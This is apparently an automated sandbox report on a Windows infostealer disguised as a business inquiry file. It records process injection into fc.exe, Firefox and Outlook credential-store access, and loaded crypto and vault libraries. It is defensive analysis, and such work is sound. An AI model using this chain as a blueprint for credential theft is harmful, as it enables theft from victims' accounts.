              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B582A9_2_039B582A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039AD0299_2_039AD029
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B58259_2_039B5825
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039AF04A9_2_039AF04A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039AEE2A9_2_039AEE2A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B762A9_2_039B762A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039CDC7A9_2_039CDC7A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CA35210_2_037CA352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371E3F010_2_0371E3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037D03E610_2_037D03E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037B027410_2_037B0274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037902C010_2_037902C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0379815810_2_03798158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037AA11810_2_037AA118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0370010010_2_03700100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C81CC10_2_037C81CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037D01AA10_2_037D01AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037A200010_2_037A2000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371077010_2_03710770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0373475010_2_03734750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0370C7C010_2_0370C7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0372C6E010_2_0372C6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371053510_2_03710535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037D059110_2_037D0591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C244610_2_037C2446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037B442010_2_037B4420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037BE4F610_2_037BE4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CAB4010_2_037CAB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C6BD710_2_037C6BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0370EA8010_2_0370EA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0372696210_2_03726962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037129A010_2_037129A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037DA9A610_2_037DA9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371A84010_2_0371A840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371284010_2_03712840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0373E8F010_2_0373E8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_036F68B810_2_036F68B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03784F4010_2_03784F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03730F3010_2_03730F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037B2F3010_2_037B2F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03752F2810_2_03752F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371CFE010_2_0371CFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03702FC810_2_03702FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0378EFA010_2_0378EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03710E5910_2_03710E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CEE2610_2_037CEE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CEEDB10_2_037CEEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03722E9010_2_03722E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CCE9310_2_037CCE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037ACD1F10_2_037ACD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371AD0010_2_0371AD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0370ADE010_2_0370ADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03728DBF10_2_03728DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03710C0010_2_03710C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03700CF210_2_03700CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037B0CB510_2_037B0CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_036FD34C10_2_036FD34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C132D10_2_037C132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0375739A10_2_0375739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037B12ED10_2_037B12ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0372B2C010_2_0372B2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037152A010_2_037152A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037DB16B10_2_037DB16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0374516C10_2_0374516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_036FF17210_2_036FF172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371B1B010_2_0371B1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C70E910_2_037C70E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CF0E010_2_037CF0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037170C010_2_037170C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037BF0CC10_2_037BF0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CF7B010_2_037CF7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C16CC10_2_037C16CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C757110_2_037C7571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037AD5B010_2_037AD5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0370146010_2_03701460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CF43F10_2_037CF43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CFB7610_2_037CFB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03785BF010_2_03785BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0374DBF910_2_0374DBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0372FB8010_2_0372FB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03783A6C10_2_03783A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CFA4910_2_037CFA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C7A4610_2_037C7A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037BDAC610_2_037BDAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03755AA010_2_03755AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037ADAAC10_2_037ADAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037B1AA310_2_037B1AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0371995010_2_03719950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0372B95010_2_0372B950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037A591010_2_037A5910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0377D80010_2_0377D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037138E010_2_037138E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CFF0910_2_037CFF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CFFB110_2_037CFFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03711F9210_2_03711F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03719EB010_2_03719EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C7D7310_2_037C7D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037C1D5A10_2_037C1D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03713D4010_2_03713D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0372FDC010_2_0372FDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03789C3210_2_03789C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037CFCF210_2_037CFCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB1FD010_2_02EB1FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EACE8010_2_02EACE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EAD0A010_2_02EAD0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EAB08010_2_02EAB080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EAB07F10_2_02EAB07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EA11E710_2_02EA11E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EAB1C410_2_02EAB1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EAB1D010_2_02EAB1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB568010_2_02EB5680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB388010_2_02EB3880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB387B10_2_02EB387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02ECBCD010_2_02ECBCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352E2F510_2_0352E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352E7B310_2_0352E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352E57B10_2_0352E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352E41310_2_0352E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352CB1310_2_0352CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_0352D87810_2_0352D878
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056D7D5C11_2_056D7D5C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056E055C11_2_056E055C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056D7F7C11_2_056D7F7C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056D5F5C11_2_056D5F5C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056DE75C11_2_056DE75C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056D5F5B11_2_056D5F5B
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056DE75711_2_056DE757
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056DCEAC11_2_056DCEAC
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056CC0C311_2_056CC0C3
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056D60AC11_2_056D60AC
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056D60A011_2_056D60A0
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 11_2_056F6BAC11_2_056F6BAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03757E54 appears 102 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0377EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0378F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 036FB970 appears 275 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03745130 appears 58 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 0157EA12 appears 86 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 01557E54 appears 111 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 0158F290 appears 105 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 014FB970 appears 277 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 01545130 appears 58 times
              Source: CSZ inquiry for MH raw material.exeStatic PE information: No import functions for PE file found
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000144C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.0000000001238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.000000000116A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000017A1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CSZ inquiry for MH raw material.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@6/6
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user~1\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: CSZ inquiry for MH raw material.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 0000000A.00000002.2505857523.000000000331F000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2505857523.0000000003351000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2505857523.0000000003340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: CSZ inquiry for MH raw material.exeReversingLabs: Detection: 73%
              Source: CSZ inquiry for MH raw material.exeVirustotal: Detection: 66%
              Source: unknownProcess created: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe "C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe"
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: CSZ inquiry for MH raw material.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1663413892.000000000122D000.00000004.00000020.00020000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000002.2506703605.00000000011C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mSWyWMUGFWJCYT.exe, 00000009.00000000.1586785927.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000000.1731726848.0000000000C3E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: CSZ inquiry for MH raw material.exe, CSZ inquiry for MH raw material.exe, 00000000.00000003.1569694869.000000000131F000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.000000000166E000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.1567553117.0000000001047000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000A.00000003.1666491001.0000000003525000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000003.1663813416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.000000000386E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000A.00000002.2507791138.00000000036D0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E790BB pushad ; iretd 0_2_00E790E4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E73863 push ss; iretd 0_2_00E73880
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E63490 push eax; ret 0_2_00E63492
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E74DC4 pushfd ; retf 0_2_00E74DCE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D225F pushad ; ret 0_2_014D27F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D27FA pushad ; ret 0_2_014D27F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015009AD push ecx; mov dword ptr [esp], ecx0_2_015009B6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D283D push eax; iretd 0_2_014D2858
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D135E push eax; iretd 0_2_014D1369
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B7BD2 pushad ; iretd 9_2_039B7BFB
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039BDB13 push ecx; ret 9_2_039BDB14
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039BD938 push FFFFFFADh; ret 9_2_039BD93A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039B38DB pushfd ; retf 9_2_039B38E5
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039BCFBB push cs; retf 9_2_039BCFC4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037009AD push ecx; mov dword ptr [esp], ecx10_2_037009B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBB011 push cs; retf 10_2_02EBB01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBBB69 push ecx; ret 10_2_02EBBB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EBB98E push FFFFFFADh; ret 10_2_02EBB990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EB1931 pushfd ; retf 10_2_02EB193B
